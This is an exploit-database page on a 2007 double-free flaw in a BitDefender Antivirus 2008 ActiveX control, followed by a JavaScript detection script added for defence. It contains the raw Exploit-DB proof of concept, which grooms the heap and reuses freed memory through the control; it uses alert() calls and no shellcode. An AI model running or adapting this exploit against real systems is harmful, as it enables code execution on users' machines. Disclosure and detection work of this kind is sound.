BitDefender Antivirus 2008 ActiveX Control Double-Free Vulnerability - exploit.company
Vendor: BitDefender Antivirus
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 415 (Double-Free Vulnerability)
Product Name: BitDefender Antivirus
Affected Version From: BitDefender Antivirus 2008
Affected Version To: BitDefender Antivirus 2008
Patch Exists: NO
Related CWE: CVE-2007-5582
CPE: a:bitdefender:antivirus:2008
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

BitDefender Antivirus 2008 ActiveX Control Double-Free Vulnerability

A BitDefender Antivirus 2008 ActiveX control is prone to a double-free vulnerability because of a flaw in the way that the 'bdelev.dll' library handles certain object data prior to returning it. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Update to a newer version of BitDefender Antivirus or switch to a different antivirus solution.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26824/info

this.Oleaut32 = new Array();
this.Oleaut32["cache"] = new Array();
this.base = "A";
while (base.length<0x8000) base+= base;
this.base = base.substring (0, (0x8000-6)/2);
CollectGarbage();
// Fill the cache with blocks of maximum size
for (i=0;i<6;i++)
{
    this.Oleaut32["cache"].push(base.substring (0, (0x20-6)/2));
    this.Oleaut32["cache"].push(base.substring (0, (0x40-6)/2));
    this.Oleaut32["cache"].push(base.substring (0, (0x100-6)/2));
    this.Oleaut32["cache"].push(base.substring (0, (0x8000-6)/2));
}
this.bitdefender = new ActiveXObject('bdelev.ElevatedHelperClass.1');
// Free the oleaut32 cache
delete Oleaut32["cache"];
CollectGarbage();
// POC
for (pid=0;pid<4000;pid+=4)
{
    try
    {
        // Find first Module_Path
        var Module_Path = bitdefender.Proc_GetName_PSAPI (pid);
        // Display the original string in the freed memory block
        alert (Module_Path); // -> C:\Windows\... (example)
        // Reuse the freed block
        var y = base.substring(0,Module_Path.length);
        // Display the result of overwriting the memory
        alert (Module_Path); // -> AAAAAAAAAAAA...
        break;
    }
    catch(e) {}
}
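
Detection sketch for the PoC above, added here as an example and not part of the original advisory or the Exploit-DB entry: it flags script content that instantiates the 'bdelev.ElevatedHelperClass.1' control or calls Proc_GetName_PSAPI, as a proxy or mail content filter might. The version-independent ProgID form, the function names and the sample strings are assumptions constructed for illustration.

```javascript
// Added example: content check for pages that load the BitDefender control
// named in the PoC. Function names and samples are hypothetical/constructed.
const PROGID = "bdelev.elevatedhelperclass"; // ProgID from the PoC, lower-cased
const METHOD = "proc_getname_psapi";         // method the PoC calls

// Undo two simple disguises before matching: \xNN / \uNNNN escapes inside
// string literals, and a ProgID split across concatenated literals.
function normalize(src) {
  return src
    .replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi,
      (_, h2, h4) => String.fromCharCode(parseInt(h2 || h4, 16)))
    .replace(/["']\s*\+\s*["']/g, "")
    .toLowerCase(); // registry lookup of a ProgID is case-insensitive
}

function scan(src) {
  const s = normalize(src);
  const findings = [];
  // Assumption: the ".1" version suffix may be absent (version-independent form).
  const create = /activexobject\s*\(\s*["']bdelev\.elevatedhelperclass(\.\d+)?["']/;
  if (create.test(s)) findings.push("instantiates " + PROGID);
  else if (s.includes(PROGID)) findings.push("mentions " + PROGID);
  if (s.includes(METHOD)) findings.push("calls " + METHOD);
  return findings;
}

// Constructed sample inputs (not captured traffic).
const samples = {
  direct: "var o = new ActiveXObject('bdelev.ElevatedHelperClass.1'); o.Proc_GetName_PSAPI(4);",
  split: 'var o = new ActiveXObject("BDELEV.Elevated" + "HelperClass.1");',
  escaped: "new ActiveXObject('\\x62delev.ElevatedHelperClass.1')",
  benign: "var x = new ActiveXObject('Scripting.Dictionary');",
};

for (const [name, src] of Object.entries(samples)) {
  console.log(name, scan(src));
}
```

A non-empty result from scan() means the content touches the vulnerable control and should be blocked or reviewed; plain string matching of this kind will not see through heavier script obfuscation.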